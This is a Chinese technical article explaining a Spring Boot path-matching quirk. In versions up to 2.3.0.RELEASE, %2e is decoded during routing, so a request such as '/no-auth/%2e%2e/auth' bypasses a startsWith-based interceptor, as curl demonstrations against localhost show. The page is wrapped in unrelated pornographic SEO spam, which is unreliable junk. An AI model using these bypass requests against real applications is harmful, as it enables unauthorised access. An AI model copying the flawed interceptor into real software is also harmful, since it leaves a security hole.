日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区

您的位置:首頁技術文章
文章詳情頁

詳解SpringBoot中關于%2e的Trick

瀏覽:87日期:2023-03-17 18:46:10

分享一個SpringBoot中關于%2e的小Trick。先說結論,當SpringBoot版本在小于等于2.3.0.RELEASE的情況下, alwaysUseFullPath 為默認值false,這會使得其獲取ServletPath,所以在路由匹配時會對 %2e 進行解碼,這可能導致身份驗證繞過。而反過來由于高版本將 alwaysUseFullPath 自動配置成了true從而開啟全路徑,又可能導致一些安全問題。

這里我們來通過一個例子看一下這個Trick,并分析它的原因。

首先我們先來設置SprinBoot版本

<parent><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-parent</artifactId><version>2.3.0.RELEASE</version><relativePath/> <!-- lookup parent from repository --> </parent>

編寫一個Controller

@RestControllerpublic class httpbinController { @RequestMapping(value = 'no-auth', method = RequestMethod.GET) public String noAuth() {return 'no-auth'; } @RequestMapping(value = 'auth', method = RequestMethod.GET) public String auth() {return 'auth'; }}

接下來配置對應的Interceptor來實現對除no-auth以外的路由的攔截

@Configurationpublic class WebMvcConfig implements WebMvcConfigurer { @Override public void addInterceptors(InterceptorRegistry registry) {registry.addInterceptor(handlerInterceptor())//配置攔截規則.addPathPatterns('/**'); } @Bean public HandlerInterceptor handlerInterceptor() {return new PermissionInterceptor(); }}

@Componentpublic class PermissionInterceptor implements HandlerInterceptor { @Override public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {String uri = request.getRequestURI();uri = uri.replaceAll('//', '/');System.out.println('RequestURI: '+uri);if (uri.contains('..') || uri.contains('./') ) { return false;}if (uri.startsWith('/no-auth')){ return true;}return false; }}

由上面代碼可以知道它使用了getRequestURI來進行路由判斷。通常你可以看到如 startsWith , contains 這樣的判斷方式,顯然這是不安全的,我們繞過方式由很多比如 .. 或 ..; 等,但其實在用 startsWith 來判斷白名單時構造都離不開跨目錄的符號 ..那么像上述代碼這種情況又如何來繞過呢?答案就是 %2e發起請求如下

$ curl -v 'http://127.0.0.1:8080/no-auth/%2e%2e/auth'* Trying 127.0.0.1...* TCP_NODELAY set* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)> GET /no-auth/%2e%2e/auth HTTP/1.1> Host: 127.0.0.1:8080> User-Agent: curl/7.64.1> Accept: */*>< HTTP/1.1 200< Content-Type: text/plain;charset=UTF-8< Content-Length: 4< Date: Wed, 14 Apr 2021 13:22:03 GMT<* Connection #0 to host 127.0.0.1 left intactauth* Closing connection 0

RequestURI輸出為

RequestURI: /no-auth/%2e%2e/auth

可以看到我們通過 %2e%2e 繞過了PermissionInterceptor的判斷,同時匹配路由成功,很顯然應用在進行路由匹配時對 %2e 進行了解碼。

我們再來切換SpringBoot版本再來看下

<version>2.3.1.RELEASE</version>

發起請求,當然也是過了攔截,但沒有匹配路由成功,返回404

$ curl -v 'http://127.0.0.1:8080/no-auth/%2e%2e/auth'* Trying 127.0.0.1...* TCP_NODELAY set* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)> GET /no-auth/%2e%2e/auth HTTP/1.1> Host: 127.0.0.1:8080> User-Agent: curl/7.64.1> Accept: */*>< HTTP/1.1 404< Vary: Origin< Vary: Access-Control-Request-Method< Vary: Access-Control-Request-Headers< Content-Length: 0< Date: Wed, 14 Apr 2021 13:17:26 GMT<* Connection #0 to host 127.0.0.1 left intact* Closing connection 0

RequestURI輸出為

RequestURI: /no-auth/%2e%2e/auth

可以得出結論當SpringBoot版本在小于等于2.3.0.RELEASE的情況下,其在路由匹配時會對 %2e 進行解碼,這可能導致身份驗證繞過。

那么又為什么會這樣?

在SpringMVC進行路由匹配時會從DispatcherServlet開始,然后到HandlerMapping中去獲取Handler,在這個時候就會進行對應path的匹配。

我們來跟進代碼看這個關鍵的地方 org.springframework.web.util.UrlPathHelper#getLookupPathForRequest(javax.servlet.http.HttpServletRequest)這里就出現有趣的現象,在2.3.0.RELEASE中 alwaysUseFullPath 為默認值false

詳解SpringBoot中關于%2e的Trick

而在2.3.1.RELEASE中 alwaysUseFullPath 被設置成了true

詳解SpringBoot中關于%2e的Trick

這也就導致了不同的結果,一個走向了 getPathWithinApplication 而另一個走向了 getPathWithinServletMapping在 getPathWithinServletMapping 中會獲取ServletPath,ServletPath會對其解碼,這個很多講Tomcat url差異的文章都提過了,就不多說了。所以解釋了最終出現繞過的情況。

那么Trick的具體描述就成了當SpringBoot版本在小于等于2.3.0.RELEASE的情況下, alwaysUseFullPath 為默認值false,這會使得其獲取ServletPath,所以在路由匹配時會對 %2e 進行解碼,這可能導致身份驗證繞過。

而這和Shiro的CVE-2020-17523中的一個姿勢形成了呼應,只要高版本SpringBoot就可以了不用非要手動設置 alwaysUseFullPath

$ curl -v http://127.0.0.1:8080/admin/%2e* Trying 127.0.0.1...* TCP_NODELAY set* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)> GET /admin/%2e HTTP/1.1> Host: 127.0.0.1:8080> User-Agent: curl/7.64.1> Accept: */*>< HTTP/1.1 200< Content-Type: text/plain;charset=UTF-8< Content-Length: 10< Date: Wed, 14 Apr 2021 13:48:33 GMT<* Connection #0 to host 127.0.0.1 left intactadmin page* Closing connection 0

感興趣的可以再看看說不定有額外收獲

話說回來,可是為什么在高版本中 alwaysUseFullPath 會被設置成true呢?

這就要追溯到 org.springframework.boot.autoconfigure.web.servlet.WebMvcAutoConfiguration.WebMvcAutoConfigurationAdapter#configurePathMatch在spring-boot-autoconfigure-2.3.0.RELEASE中

詳解SpringBoot中關于%2e的Trick

在spring-boot-autoconfigure-2.3.1.RELEASE中

詳解SpringBoot中關于%2e的Trick

為什么要這樣設置?我們查看git log這里給出了答案。

詳解SpringBoot中關于%2e的Trick

https://github.com/spring-projects/spring-boot/commit/a12a3054c9c5dded034ee72faac20e578b5503af

當Servlet映射為”/”時,官方認為這樣配置是更有效率的,因為需要請求路徑的處理較少。

配置servlet.path可以通過如下,但通常不會這樣配置除非有特殊需求。

spring.mvc.servlet.path=/test/

所以最后,當SpringBoot版本在小于等于2.3.0.RELEASE的情況下, alwaysUseFullPath 為默認值false,這會使得其獲取ServletPath,所以在路由匹配時會對 %2e 進行解碼,這可能導致身份驗證繞過。而高版本為了提高效率對 alwaysUseFullPath 自動配置成了true從而開啟全路徑,這又造就了Shiro的CVE-2020-17523中的一個利用姿勢。

到此這篇關于詳解SpringBoot中關于%2e的Trick的文章就介紹到這了,更多相關SpringBoot Trick內容請搜索好吧啦網以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持好吧啦網!

標簽: Spring
相關文章:
日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区
亚洲区第一页| 在线一区电影| 亚洲精品少妇| 蜜臀国产一区二区三区在线播放| 欧美亚洲国产精品久久| 超碰超碰人人人人精品| 五月激情久久| 久久精品不卡| 视频福利一区| 大香伊人久久精品一区二区| 精品一区二区三区免费看| 欧美精品99| 美女国产精品久久久| 久久在线91| 国产一区2区| 精品日韩视频| 女人天堂亚洲aⅴ在线观看| 亚洲欧美久久| 欧美精品中文字幕亚洲专区| 国产精品一线天粉嫩av| 免费一区二区三区在线视频| 精品国产免费人成网站| 天堂资源在线亚洲| 久久aⅴ国产紧身牛仔裤| 亚洲综合不卡| 日韩精品高清不卡| 国产精品欧美三级在线观看| 麻豆成人av在线| 日韩理论视频| 日韩视频不卡| 97精品资源在线观看| 精品视频在线观看网站| 久久久夜精品| 亚洲欧美网站在线观看| 欧美激情一区| 午夜免费一区| 国产精品一区二区精品 | 中文字幕免费精品| 日韩精品乱码av一区二区| 蜜桃精品视频| 欧美日韩国产探花| 国产亚洲精品精品国产亚洲综合| 91日韩欧美| 噜噜噜躁狠狠躁狠狠精品视频| 国产精品一区二区99| 久久久国产精品一区二区中文| 蜜桃视频第一区免费观看| 国产精品一区二区av日韩在线| 视频小说一区二区| 亚洲一二三区视频| 色爱综合网欧美| 欧美在线亚洲综合一区| 国产精品网在线观看| 欧美成人综合| 国产精品va视频| 好看的亚洲午夜视频在线| 国产午夜精品一区在线观看| 99精品视频在线观看免费播放| 日韩毛片一区| 久久婷婷亚洲| 国产精品一国产精品k频道56| 亚洲精品一区三区三区在线观看| 亚洲aa在线| av高清不卡| 欧美一区成人| 日韩视频在线一区二区三区| 国产欧美一区二区三区米奇 | 精品视频99| 蜜臀91精品一区二区三区| 色婷婷综合网| 日韩av电影一区| 国产一区亚洲| 精品国产aⅴ| 日本综合视频| 五月天综合网站| 久久久久久婷| 欧美日韩18| 亚洲一区区二区| av资源亚洲| 牛牛精品成人免费视频| 久久aⅴ国产紧身牛仔裤| 国产精品99在线观看| 91精品一区| 99在线|亚洲一区二区| 国产精品蜜芽在线观看| 欧美日一区二区三区在线观看国产免| 亚洲免费播放| 久久天堂精品| 国产精品不卡| 免费日韩成人| 奇米色欧美一区二区三区| 亚洲一区成人| 亚洲手机视频| 色偷偷偷在线视频播放| 国产精品国产三级在线观看| 日韩在线播放一区二区| 欧美丝袜一区| 亚洲涩涩在线| 成人日韩av| 国产激情久久| 日韩va欧美va亚洲va久久| 免费日韩精品中文字幕视频在线| 久久裸体视频| 樱桃视频成人在线观看| 免费看一区二区三区| 国产精品一区2区3区| 欧美中文一区| 麻豆一区在线| 久久天堂影院| 麻豆精品少妇| 7777精品| 欧美在线91| 欧美日一区二区三区在线观看国产免 | 国产精品一区二区三区美女| 亚洲精品激情| 美国三级日本三级久久99| av不卡免费看| 国产一区二区精品| 91成人精品视频| 欧美日韩精品一本二本三本| 久久久久中文| 午夜精品久久久久久久久久蜜桃| 日韩成人精品一区二区| av综合电影网站| 久久精品亚洲人成影院| 欧美影院三区| 悠悠资源网久久精品| 亚洲欧洲一区二区天堂久久| 香蕉精品999视频一区二区| 亚洲免费成人| 免费中文字幕日韩欧美| 麻豆成人在线| 在线视频亚洲欧美中文| 亚洲精品一二三**| 91亚洲精品在看在线观看高清| 日本aⅴ免费视频一区二区三区| 久久最新视频| 视频精品一区| 日韩av电影一区| 久久狠狠亚洲综合| 国产精品日韩精品在线播放| 精品久久福利| 久久久久亚洲| 亚洲欧美日本日韩| 日韩**一区毛片| 欧美精品导航| 亚洲精品一区三区三区在线观看| 免费观看不卡av| 99在线观看免费视频精品观看| 亚洲日产av中文字幕| 国产乱子精品一区二区在线观看 | 日韩精彩视频在线观看| 久久国产乱子精品免费女| 久久精品国产99| 久久九九99| 蜜桃视频免费观看一区| 国产精品一级在线观看| 日韩免费久久| 亚洲一区欧美激情| 国产免费av一区二区三区| 欧美激情另类| 99综合视频| 蜜桃av一区二区在线观看| 欧美日韩亚洲国产精品| 高清av一区| 99在线观看免费视频精品观看| 日韩手机在线| 欧美激情久久久久久久久久久| 秋霞影院一区二区三区| 日本大胆欧美人术艺术动态| 国产日本亚洲| 久久久久国产| 欧美久久香蕉| 久久蜜桃精品| 69堂精品视频在线播放| 色爱av综合网| 亚洲另类黄色| 国产在线不卡一区二区三区| 午夜欧美在线| 国产精品2023| 免费av一区二区三区四区| 日韩av电影一区| 麻豆精品蜜桃| 日本高清久久| 视频福利一区| 日本欧美在线| 久久九九国产| 欧美激情网址| 欧美专区18| 国产精品蜜芽在线观看| 亚洲有吗中文字幕| 国产精品原创| 成人免费电影网址| 一区二区91| 中文在线免费视频| 一区二区国产在线观看| 国产videos久久| 亚洲乱亚洲高清| 亚洲va中文在线播放免费| 亚洲精品黄色|